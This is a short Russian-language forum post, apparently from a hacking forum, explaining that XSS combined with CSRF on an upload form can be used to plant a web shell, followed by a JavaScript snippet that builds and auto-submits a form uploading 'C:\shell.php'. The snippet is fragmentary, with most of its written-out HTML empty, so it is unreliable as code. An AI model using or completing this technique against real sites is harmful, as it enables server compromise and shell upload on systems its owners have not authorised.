28.05.2014, 17:01
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Имея на руках лишь XSS, без примесей, шелл залить вы не сможете.
А вот при наличии XSS + CSRF в форме аплоада - уже неплохие шансы.
Лить придётся как-то так...
Код:
document.writeln('');
function read(){
var nameF = 'C:\shell.php';
document.writeln('');
document.writeln('');
document.writeln('
');
document.writeln('');
document.forms[0].submit.click();
}
|
|
|